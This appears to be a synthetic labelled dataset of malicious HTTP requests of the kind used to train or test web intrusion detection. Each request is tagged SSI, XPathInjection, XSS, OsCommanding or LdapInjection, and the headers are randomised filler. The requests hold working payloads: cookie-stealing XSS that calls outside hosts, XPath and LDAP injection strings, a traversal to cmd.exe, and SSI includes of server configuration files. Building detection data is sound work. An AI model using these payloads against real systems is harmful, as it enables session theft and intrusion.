UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: HTTP/5.2 55.120.255.95, 9.5 193.134.181.80:2
Transfer-Encoding: tiwtae
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39757
Start - Id: 39203
class: SSI
PUT /iiGiZHD/wtmqhpe/s@s/jE3_wpkcJLASYxTiq/uCI.unionR/e5ausI/ePtzW60neKoXPqXzwi6o/bIQ3PJY8YmV_Or1BVK/a3qG32v27SxMUjrwfxi/nhIpti4erwc/m4..shtml? HTTP/1.0
Content-Length: 248
Content-Language: tsaeti
Content-Encoding: gzip
Content-Location: /k1n4ca/ietnUyoo/ssaa6.gif
Content-MD5: cnRteWVpZ2FoYTllemdlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Tue, 03 Apr 07 13:41:06 UTC
Host: 171.179.66.94
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 214.102.152.111
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Tue, 12 Jan 10 10:40:29 CET
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: xxiea1au@lirimthobc.net
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Tue, 18 Nov 08 10:45:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Oct 07 19:30:55 UTC
Max-Forwards: 55
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Digest algorithm=gednec
Range: -6444
Referer: http://seaws.com/wpnogeI/nrto.jpg
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: s8hd (afINMf.A)
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: deflate
Upgrade: Dhol4t/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eto=jpm&Rce7ets=nnboot.ini r/irTEd\&gbnagazesimt=71407&gf=<!--#echo var="date_gmt"-->&tr6nerRI=vcWHk_&roe=o.n2eXmq&metaEU6o=700846&Apposition6XincludeQdimgDJdiv=aBdMF3JD&2riyrrr=5Ibaie&system_T_vme=iecSnrn7elnn6&9to37un=3138308776

End - Id: 39203
Start - Id: 35657
class: XPathInjection
GET /pmr1hmmYged7@_X3e/ioemtnCiNuineePyE/r0xMdEIJLW0-Eg/ErarkosteSiR/aX8Dz/bqZ7_A/oN./aeiaprtqef2epw/rTvrmayuaifO1ra.html?eitsenhpsq=l.q3JOh&uhqdoopmbr0=aIgP4vNSflG&TLGTx1e=iPqeedpm%27+++++or+count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i++%2B+j%2B++++k%2B++++l++%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++%27tsta0neh%27%3D%27++rd%27++or&uDTiet=os%2BnL0cngH HTTP/1.1
Host: www.nsy1fc.biz
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: deflate, deflate;q=0.2, gzip, deflate;q=0.9, gzip;q=0.3
Accept-Language: *;q=0.7
Cache-Control: min-fresh=40618
Client-ip: 224.14.224.59
Cookie: pqQlS1HfH=8winnt;sa8fatocrtbL=kn]
Cookie2: $Version="043"
Date: Sun, 16 Aug 09 20:01:20 CET
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: njsh@NrDrfrcud.com
If-Modified-Since: Tue, 04 Apr 06 10:00:44 UTC
If-Unmodified-Since: Wed, 20 Feb 08 04:32:40 UTC
If-Match: *
If-None-Match: "ELB9rkq_.Cv9cLxCfC1"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvqbts otO9e=Oh7KonRe
Authorization: tpct Qeea=aleyeri8
Range: -472
Referer: http://www.ytgzatE.com/ooMvvre/ninhnrss/e8Gtas0.jpeg
TE: deflate;q=0.6,trailers,deflate;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/7.7 (compatible; Konqueror/3.7; SunOS sun4u; amtsytvr)
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8105x4373
Via: 8.9 www.ysttes.jpeg:72, HTTP/8.6 155.185.245.126
Transfer-Encoding: compress
Upgrade: deki/7.7
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35657
Start - Id: 49800
class: XPathInjection
GET /OGZrm/s4/sHbliwzaNeNu/ga4IedeeeZf/afSfnccva9/mpeJhThs7c3lTearifee.shtml?as74m=ent5C&P9tPhimpf=e%3AbintaenyAbtnhh+i&7IKPBu=otoo%3Acnl&notu=a+mUc%3BRadminnodea%3Fdu+aMc+e&deumfediN7t=4339+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++673%3D&hbektzx=oDe&TIieQpuh=av3oaljEiwebt&Nsl5Lsw=t0A.NM8H&oU0dsts=n7l5fJ5KgeGB&pi6soyyYfo=8eaUboot.inica1lwisacceptoh HTTP/1.1
Host: www.rndat7Acy.biz:920
Connection: keep-alive
Accept: video/mpeg;q=0.0
Accept-Charset: cp-950;q=0.1, big5, x-mac-hebrew;q=0.5
Accept-Encoding: *
Accept-Language: ed-wr40nee;q=0.7, a-nzptre, i-le;q=0.2
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Sun, 12 Jun 05 07:39:29 UTC
ETag: "G2lvDzt3GUzDs0U4"
Expect: 100-continue
From: ic2oxryy@hens5ahgle.org
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: *
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: Mon, 03 Jan 05 22:40:52 CET
Max-Forwards: 4648
MIME-Version: 1.9
Pragma: semyhzhs='smdtl'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: http://www.wnEmee.gov/itygq/euo6hs/9ouus8/XrGw/enbj.shtml
TE: trailers
Trailer: Accept-Encoding
User-Agent: 9IsnqsoTwrbbeok
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6139x931
Via: 9.3 www.meuqs.jpeg
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 153.197.11.133
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49800
Start - Id: 46626
class: XSS
GET /otltonb3fd/EnOcss.asmx?nroieoay=44121&7zfromPVdv=ntcebetween4oaenq&fOcsnA6d=o%2Btr%40Olirwlri%3E&IxhumpwwtsyE=oE HTTP/1.0
Host: 85.222.19.165:2
Connection: close
Accept: image/*;q=0.1, application/postscript
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: <!-- -- --><script  >[window.open('http://7.75.221.209/tine.cgi'+document.cookie);]</script  ><!-- -- -->
Cache-Control: no-transform
Client-ip: 130.168.197.72
Cookie: eeh8Iehc=04;oreretbhsrs=np3c;CKoFrpXX3netcatall=49;oqcuuwlTQligtm=7924
Cookie2: $Version="5"
Date: Sun, 22 Feb 04 03:26:28 CET
ETag: "hLyaMByyJCTCXQL5Zz8u"
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Tue, 24 Aug 04 15:54:19 UTC
If-None-Match: "xKH-WAALjNlvfIOToW"
If-Range: Wed, 18 Apr 07 22:31:32 CET
Max-Forwards: 183
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: jmphtr hsh4mub=vySOi
Referer: /5c2ca7/sasfo/aune5j0/UnUdeos.swf
TE: trailers,trailers
User-Agent: tstaoi
UA-Pixels: 7335x113
Via: 2.4 218.153.133.41:20, eelS6/7.9 www.cAeetT3t.js, tfi/1.4 24.248.3.119
Transfer-Encoding: gzip
Upgrade: Ecza/9.5

null

End - Id: 46626
Start - Id: 44455
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 133.73.178.194
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Aoeo-e5, oLAT-d7iwsl, eynn-uh, teut-ap;q=0.7
Cache-Control: only-if-cached
Client-ip: 205.41.49.247
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="0"
Date: Sun, 21 Mar 10 17:46:31 UTC
ETag: "Bc5LCDc_8.QFCBUmEc7y"
Expect: 100-continue
From: j7edhan@ytphgnbey0.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 1.4
Pragma: trzin='etkp4ct'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic ZnRzcmFvOmVzYXhn
Range: 6-02287,72753-
Referer: http://aats.de/rrer/ezlre/eStrwid.wmn
TE: gzip
Trailer: Expect
User-Agent: Mozilla/6.3 (compatible; MSIE 6.2; Mac OS X; wwsw7)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 0.9 www.tseim1a.css, 7.6 125.143.134.253, FTP/1.7 77.130.186.121
Transfer-Encoding: compress
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44455
Start - Id: 38414
class: LdapInjection
GET /5ht/bdoongEnektra/nPGWrak11aLBObnRE/33OVt/0lqne.js?D7upDtA=%29+u&es4dVZrrsWtoH=mnatwe&8CBbEmzu2=28003&uxtlbiaayfzjt=9953&m4=rh--kfK1&1temntsxtwdsr=3705&CS0dwkrbgsound=1565083&end=916&koPexec=thzn&aik55stsotegieR=62%29%28%26%28objectClass%3De8ty%29%28%7C%28sn++++%3D++++ra%29%28cn%3Dacb+++++J*%29%29&nertsome=hnSjwj%24y+li&irr=t+ HTTP/1.1
Host: www.rjeg.gov:1
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: sxtl3tpn-so9a
Cache-Control: no-cache
Client-ip: 206.10.185.166
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="17"
Date: Wed, 11 Apr 07 19:20:25 CET
ETag: "wl@UfNXB1fE.YUPM_nzA"
Expect: oyansloy=vjyun
From: r8urdpH@atna.uk
If-Modified-Since: Thu, 21 Feb 08 21:32:12 CET
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: "Fmwx1SKE5xDjgnGmsBGY"
If-None-Match: "NqZdmVjfMA5II.S"
If-Range: Tue, 18 Apr 06 01:20:04 GMT
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: itr19ce=rreota
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM YTllYXVzcm96YW9pN29sbkV2blNBb2FlbzNldGlzNGVhc2t4bmU=
Range: -96373
Referer: http://phs1kaut.com/NreoimG/lsbcts/niiU32/oaR3n/wisLra.exe
TE: trailers,deflate;q=0.1
Trailer: Max-Forwards
User-Agent: edtgoeaiteltdh
UA-CPU: Sparc
UA-Disp: 381,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0696x1408
Via: nWu5ce/4.6 www.iera.tiff:6
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38414
Start - Id: 48804
class: XPathInjection
GET /oo0.Fe8fIVgsOye0j/L.d9vKL_TLBzv/rh8lea8atbbp6itlsn6h/nz.pl?7iiloe=0602&E6usfmftyhsemt=%28i+++%3C++++count%28a5ne%2Fchild%3A%3Atext%28%29%29+++and+++j+++++%3C+++++count%28T3r%2Fchild%3A%3Acomment%28%29%29+and+++k++%3C++++count%28wzfea%2Fchild%3A%3A*%29++%29&eeeoilwtee=Trlsystem HTTP/1.0
Host: 27.90.125.210
Connection: rubln
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: te-snnd;q=0.3, avrI-vw1e;q=0.5, hEd-he;q=0.8, mteemo-r5w2iec;q=0.3
Cache-Control: no-store
Client-ip: 215.6.165.172
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="7"
Date: Mon, 07 Aug 06 17:42:32 UTC
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: x2larteo
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Mon, 31 Mar 08 03:50:52 GMT
If-Match: "46Wnu8zuFB0Kz6jfl"
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Digest nonce
Range: -77394
Referer: /iNyst8c.pl
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: lkbTSX http://www.izgn6.ch
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.0 www.am452.js, FTP/4.4 www.arna.css, 0.3 www.snIea7W.png
Transfer-Encoding: compress
Upgrade: lenhnX/9.5, gey1rc/0.5, ma7iss/4.7, suiars/6.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48804
Start - Id: 47500
class: XSS
GET /4OdwZ6Fs@/aM-nr.shtml?pa=%3Cobject++++classid+%3D++%22+++clsid%3A...++%22+++codebase++%3D+++%22+++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.geni.com%2Fcgi-bin%2Flaerasng.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E HTTP/1.0
Host: www.etmhlt.ch
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-3;q=0.4, x-mac-icelandic, iso-10646-ucs-2, euc-cn
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: max-age=08774
Client-ip: 121.61.23.210
Cookie: emahgsdcedinet=ohemi;nzehhatapl=305098573
Cookie2: $Version="037"
Date: Thu, 24 Jan 08 13:12:16 GMT
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Mon, 17 Aug 09 11:57:20 UTC
If-Unmodified-Since: Tue, 05 May 09 21:21:18 GMT
If-Match: *
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: *
Max-Forwards: 34
MIME-Version: 4.9
Pragma: nheqsgo='lToex'
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /atrae/iotunuo.mspx
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/0.0 (X11; U; SunOS sun4u 2.7; 0i-of; rv:6.8.1) Gecko/63620973
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: gzip
Upgrade: mrsd/9.5, owur/3.3
Warning: 771 227.153.234.137 "zyfairhnrumgfhbhiV" "Thu, 01 Jan 09 02:19:05 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47500
Start - Id: 49455
class: XPathInjection
GET /by7do4bstavoish/mYdkXXrDqLA/xVcOE3ute.js?iu=lN1lz&eGyNulnsde=141&ectdCiroo=56674&Hhem=73744613&bu2e2ulh0etas=ooahts%27+++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i%2B++j++++%2B+k++%2B+l+++%2B+++1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++%27esodal%27+++%3D+%27+EoAb%27+++++or&27lp64PdT=dAsystemac%3Di&d8H=gz9cpLj2&position1EneCadmin9eCt=+o HTTP/1.1
Host: 11.38.134.116
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, windows-1251, iso-2022-kr;q=0.3, iso-8859-8-i;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: sehh-ak, roenA-YcfEea, ls-sgeirg, llu0bg-sq;q=0.0
Cache-Control: no-store
Client-ip: 241.130.105.59
Cookie: sGMhpOnlgto=boot.ininoc@pOTtndocument lx;utnqenbneceagao=asxtermssJ]hs:;tEhgs3ieggnne5=smlfmlaneh|erc0binfi;arueR=oW7j
Cookie2: $Version="817"
Date: Wed, 21 Apr 04 03:37:52 CET
ETag: W/"kUU6QrCkb-GxGP.IGM"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 27 Feb 09 21:20:19 GMT
If-Unmodified-Since: Wed, 29 Nov 06 23:23:36 GMT
If-Match: "t1EbvlIreHl1-Qakk0hV"
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 93
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -012
Referer: /Nlcaet6.php
TE: deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: o8neenjgRew
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: deflate
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49455
Start - Id: 48832
class: XPathInjection
GET /ulHt2rmtDhhnEcAedlC/w9R/KaxphpTVE_3/d.QX-VrUcap4pksN6S/xsMMLGVG/hhl18c-0fV/5Mmuqm38NmrNxqQpP.tiff?HaMeblgsemobat=e7perlerhofszeP7we&edrhtc=ss%3Dselect95nEnle+a%5Du&tqiOsmrft6enow=mttnOe&ttfr=ip&7mrakyvc7u=4&dmam=q0.D_z8&ZiLkr@O3=eftpt%29tehtmpmha%3Aln&rm4hcasxk4=919205&dynin=shutdown1tbetweeneeheohl&ty9rhc8=803++++or+++++4amjc%2FIh%2FaAt0e%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D630%5D++++or+++++9%3D HTTP/1.0
Host: www.5risa.be
Connection: ctbo
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.0
Accept-Language: 1eorc-Yshne;q=0.6, ajtsizp-3on;q=0.5
Cache-Control: no-store
Client-ip: 35.113.99.20
Cookie: ufaaunoSn0wo=rah;hxp_Mcd6=23090263;sgs=1rz$tn ensh6e;axeeArke5Ad=icenghmKg;ahgfseoEngs7o=0
Cookie2: $Version="84"
Date: Thu, 24 Aug 06 24:01:48 GMT
ETag: W/"Eot2OfllQboCmLby61Ro"
Expect: ats3ir=A2el6e
From: 18kll@eaes.it
If-Modified-Since: Sat, 10 Jul 04 03:34:30 GMT
If-Unmodified-Since: Sun, 19 Aug 07 23:23:59 UTC
If-Match: "gStRGvxsbRGO-IZH"
If-None-Match: *
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 21
MIME-Version: 5.3
Pragma: jhu=esindot
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: /re6aa/olhb/yndi.mp3
TE: chunked;q=0.8
Trailer: Accept-Charset
User-Agent: HddtOketr (nd171xe9; h00Jcv@)
UA-CPU: StrongARM
UA-Disp: 6889,429,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 0.2 www.rtNemg.jpeg
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48832
Start - Id: 46990
class: XSS
GET /evalAPRZSwindow.open0TpA53/ghphsenqterhs1qi/zIq7fU/ahemsy9eteaeR/lLUamJbrMo2BKe/unJg_select.8KhH/iezdDJonPspTPKVkNJD/rEfsawaneqoheremraes/inu4i9b.htm?5coynyuieisi=186&iLme6rokTIetOhe=2&Rl=6736565&pzetd=5jdhijRetNu%7Eeutpho&teyxoTLnbts7=15631&ne=amYHbW0GW&_documentYq79X=erat591&Iy8hiirre5naxnc=77&Hnvf6=t5Ma3tr&pmat5=%3Cdiv++++style+%3D++%22++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.trolliet.com%2Fscript%2Fhmo.aspx%5D%29%3B%22++%3E&dtiygeiarvdotm=718174031&eakeu=7809923&ilhha=yyjd HTTP/1.1
Host: www.tdmsztn.com
Connection: keep-alive
Accept: image/gif;q=0.7, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: identity, gzip;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 0.51.121.220
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Sat, 23 Jul 05 09:48:45 GMT
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Wed, 05 Nov 08 03:18:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4087
MIME-Version: 0.5
Pragma: xnS8Cen='f'
Proxy-Authorization: Digest response="cA19Bf43E7BA79aC0dBFc6CE4bcbC03a"
Authorization: oiii irge1a=Lktise
Range: 5-22964
Referer: http://dhnb.st/mt1aiT/tErtlr/nfjt.sh
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.1 (X11; U; Unix 2.8; cb-e9; rv:2.7.7) Gecko/45090309
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 5.1 123.166.64.21, 6.1 www.owbem.shtml
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 758 www.hjnzhm8.html "jrtkbu" "Sat, 29 Mar 08 09:44:57 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46990
Start - Id: 38282
class: LdapInjection
GET /meat4nidenc/mt/sHvpZXpe@FF.php?2t1esenhljpp=ohhon7%2BeOfrom%5CeSetg&istisnhS=ab7&nltehyegaoefa=eteu+tdg8d%5BHdfrom3&nl7i=httpit%3Bd&eieeehrt=%29+%28+%7C%280eao%3D8Y*%29&ri5i%u0d6Zj=+-rl3evaltcaprocessing-instructionopenEeej1+Loq&soa0=1115&9_FjhidUgHr=%5D%3Bcee%5BR%5Caale2&tknceiyumelc=12238&Keb=s9rnrlevupCj4e+od%5D7&4u=4eRwi HTTP/1.1
Host: 240.251.135.114:80
Connection: keep-alive
Accept: audio/*, image/jpeg;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.8, iso-8859-2;q=0.3, x-mac-arabic, iso-8859-8;q=0.7, iso-8859-15
Accept-Encoding: 
Accept-Language: praz-5o2L;q=0.2, aSz-n, et3ml-nuids;q=0.9, s-tehalmis
Cache-Control: max-age=39379
Client-ip: 118.33.231.175
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="09"
Date: Sat, 21 Feb 04 10:29:20 UTC
ETag: W/"IIPkPon1tdf6w6D"
Expect: ggulohsa
From: 5alnury@nfraofye9.st
If-Modified-Since: Thu, 01 Jan 09 04:45:23 CET
If-Unmodified-Since: Wed, 30 Jul 08 21:12:25 CET
If-Match: "5YLzWEbY1zG@z2I"
If-None-Match: "DMm4av6EakS-AZCqD"
If-Range: Sun, 21 Feb 10 22:46:48 GMT
Max-Forwards: 941
MIME-Version: 5.0
Pragma: trieoir=detlom
Proxy-Authorization: Digest username="mscm"
Authorization: giVs8 eeKeyt=oedhece
Range: 339-28315
Referer: http://ytnfm.org/uUrlete/dyhslwl.php4
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.7 (Windows; U; WinNT 0.0; ei-en; rv:0.5.2) Gecko/12351851
UA-CPU: PowerPC
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: HTTP/2.7 188.62.144.35:64388, 5.4 www.earqh.tiff
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 189.204.106.18
X-Serial-Number: 830013506
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38282
Start - Id: 39668
class: SSI
GET /sDe01BOYtePF2QVGB3/tlvhsrw/lQkx_/Rr/eseTvEeHWFSSMzOJ/rw2TsSr5L4/svY05JEAY__BUGcR/6alcaTh8od/oAtaliuewip7aymy1tr6/eHbeeenwSat4/XrjgFpnctDjN-N/C2@I.bin?rghnnsmenmooo3=sepi%3Arn&aaPlfTce=eue%3Fryt%280athttw&ltsxgtl=24&woegiaef=%7Cw1&8t7PighOUgshd=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&fHGnG_wD2=bssu&eeor=%2Betephp%27%26elnetcatev2&Qjhavingg26wyvlikes=26&pSccsr=3928931&u1=Ce&i9afdta3un=tsock_streamtlidtmpi%7Eooith%3F&MybmLsphpi@selectQ=8reaopsnaccess_log%7Cr%3C&scs41itmeoa=8727003046 HTTP/1.0
Host: 98.99.9.169:13
Connection: close
Accept: image/gif;q=0.2, video/*;q=0.2, application/*
Accept-Charset: euc-kr;q=0.0
Accept-Encoding: 
Accept-Language: Av-It, hrue8-r7;q=0.6, no4ct-iooeww, otnorrw-twn
Cache-Control: no-transform
Client-ip: 38.60.133.84
Cookie: rrzpsODcaee=g7xy_e@kjP;ehvhayi=ci3kryne2eni;a@B-5Z3Nz8A=eedij;ekzQ=465
Cookie2: $Version="257"
Date: Fri, 27 Jul 07 08:43:32 UTC
ETag: W/"BvKJIirDto0r2ypapq"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 19 Aug 09 08:43:53 CET
If-Unmodified-Since: Fri, 24 Jun 05 19:45:12 CET
If-Match: *
